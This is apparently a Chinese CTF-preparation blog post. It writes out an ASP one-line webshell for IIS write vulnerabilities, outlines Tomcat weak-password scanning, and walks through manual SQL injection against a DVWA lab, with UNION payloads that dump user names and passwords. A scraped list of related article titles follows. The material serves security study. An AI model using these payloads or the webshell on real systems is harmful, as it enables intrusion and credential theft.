[攻防实战]CTF大赛准备(手动注入sql)
一、IIS write漏洞利用
先用工具扫描,再上传小马,使用菜刀连接即可。
思考点:
如何获知是一台IIS站点?
本例中上传的一句话木马是什么意思?
<%eval request("MH")%>
https://www.cnblogs.com/tdcqma/p/6125789.html
二、Tomcat服务器漏洞利用
先用nmap扫描端口开放信息。
然后利用metasploit或者Apache tomcat.exe工具里面的扫描办法来扫描弱口令。
需要注意的是,对于管理员账号的猜测,可以猜测admin、root、administrator等。
三、SQL 手工注入(以dvwa为例)(参考https://m.jb51.net/show/93442)
1、判断字段总数:
admin,password登录dvwa后,将安全级别调至低。进入sql injection界面。
http://192.168.8.133/dvwa/vulnerabilities/sqli/
输入1’ 报错。确认有注入漏洞。
输入1' order by 2#正常返回结果。输入1' order by 3# 报错。表明数据库只有两列。order by 后面跟的应该是第几列的列数。这样看来数据库表只有两列。结尾的#号用于截断sql语句,以免报错。也可以换做-- -
2、判断显示位
1' union select 1,2# 可以看到1,2分别显示在first name和sur name处。
3、显当前示数据库和版本信息。
1' union select database(),version()#
4、显示所有数据库的名称
1' union select SCHEMA_name,1 from information_schema.schemata#
5、显示当前数据库表名
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
可以看到当前数据库表名:guestbook,users
6、查询列名:
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
7、查询数据值
1' union select group_concat(user,password),3 from users#
其中user和password是上一步得出的结果。
也可以写作
1' union select user,password from users#
四、PHP
1、strcmp漏洞
https://blog.csdn.net/cherrie007/article/details/77473817
九、在线工具收集
1、http post工具:
http://www.atool.org/httptest.php
2、解码加密工具:
3、PHP及其他语言在线调试工具:
https://c.runoob.com/compile/1
十、CTF大赛本身学习
3、强网杯
4、XCTF(南京赛宁)
[攻防实战]CTF大赛准备(手动注入sql)的更多相关文章
- 【攻防实战】SQL注入演练!
这篇文章目的是让初学者利用SQL注入技术来解决他们面临的问题, 成功的使用它们,并在这种攻击中保护自己. 1.0 介绍 当一台机器只打开了80端口, 你最依赖的漏洞扫描器也不能返回任何有用的内容, 并 ...
- dvwa——sql手动注入和sqlmap自动注入
手动注入 low: 源码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; ...
- 20169214 2016-2017-2 《网络攻防实践》第十一周实验 SQL注入
20169214 2016-2017-2 <网络攻防实践>SQL注入实验 SQL注入技术是利用web应用程序和数据库服务器之间的接口来篡改网站内容的攻击技术.通过把SQL命令插入到Web表 ...
- WAF攻防实战
摘要 本文主要分为四个部分,一.首先对WAF做了简单的介绍,让读者对WAF这类产品有一个大概的了解:二.这部分通过一个实例演示了如何利用WAF为其后端的Web应用提供安全防护功能:三.安全是相对的,世 ...
- CTF大赛模拟-CFS三层内网漫游
CTF大赛模拟-CFS三层内网漫游 环境: 三台虚拟机,三个网络. target 1:192.168.161.178 ,192.168.52.132 (linux) target 2:192.168. ...
- PHP手动注入实验
课程编写 类别 内容 实验课题名称 PHP手动注入实验 实验目的与要求 1.通过手动注入PHP页面,获取password字段名. 2.了解PHP手动注入的基本原理. 3.了解PHP手动注入的过程和基本 ...
- 20145335郝昊《网络攻防》Bof逆向基础——ShellCode注入与执行
20145335郝昊<网络攻防>Bof逆向基础--ShellCode注入与执行 实验原理 关于ShellCode:ShellCode是一段代码,作为数据发送给受攻击服务器,是溢出程序和蠕虫 ...
- SQL注入(SQL Injection)案例和防御方案
sql注入(SQL Injection):就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. SQL注入攻击的主要危害包括:非法读取.篡 ...
- 【半小时大话.net依赖注入】(一)理论基础+实战控制台程序实现AutoFac注入
系列目录 第一章|理论基础+实战控制台程序实现AutoFac注入 第二章|AutoFac的常见使用套路 第三章|实战Asp.Net Framework Web程序实现AutoFac注入 第四章|实战A ...
随机推荐
- zabbix的配置之新版微信报警(二)
zabbix配置2018版本微信报警 centos6.5中微信报警需要Python2.7版本之上,由于服务器是centos6.5.所以需要升级版本2.6到2.7. 具体升级步骤:Python升级版本2 ...
- 原 .NET/C# 反射的的性能数据,以及高性能开发建议(反射获取 Attribute 和反射调用方法)
大家都说反射耗性能,但是到底有多耗性能,哪些反射方法更耗性能:这些问题却没有统一的描述. 本文将用数据说明反射各个方法和替代方法的性能差异,并提供一些反射代码的编写建议.为了解决反射的性能问题,你可以 ...
- 【C++】DLL内共享数据区在进程间共享数据(重要)
因项目需要,需要在DLL中共享数据,即DLL中某一变量只执行一次,在运行DLL中其他函数时该变量值不改变:刚开始想法理解错误,搜到了DLL进程间共享数据段,后面发现直接在DLL中定义全局变量就行,当时 ...
- 标准C程序设计七---00
以下内容为阅读: <21天学通C语言>(第7版) 作者:Bradley Jones Peter Aitken Dean Miller(美), 姜佑译 人民邮电出版社 2014.11 ...
- html的常见meta标签信息
设置页面不缓存<meta http-equiv="pragma" content="no-cache"><meta http-equiv=&q ...
- go--time包
格式化字符串 转 时间戳 ////获取本地location toBeCharge := "2015-01-01 00:00:00" //待转化为时间戳的字符串 注意 这里的小时和分 ...
- a href="javascript:void(0)"
JavaScript中void是一个操作符,该操作符指定要计算一个表达式但是不返回值. void 操作符用法格式如下: 1. javascript:void (expression) 2. javas ...
- HDU 4917 Permutation(拓扑排序 + 状压DP + 组合数)
题目链接 Permutation 题目大意:给出n,和m个关系,每个关系为ai必须排在bi的前面,求符合要求的n的全排列的个数. 数据规模为n <= 40,m <= 20. 直接状压DP空 ...
- 前端和后端采用接口访问时的调用验证机制(基于JWT的前后端验证)(思路探讨)
说明:基于前后端,尤其是使用Ajax请求的接口,现在市面上网页上调用的Ajax基本都是没有验证的,如果单独提取之后可以无线的刷数据. 继上一篇http://www.cnblogs.com/EasonJ ...
- java验证身份证号码是否有效源代码 wn25的头像 wn25 23 2015-01-04 20:09 6 基本信息 Java × 1 浏览
原文:http://www.open-open.com/code/view/1420373343171 1.描述 用java语言判断身份证号码是否有效,地区码.出身年月.校验码等验证算法 2.源代码 ...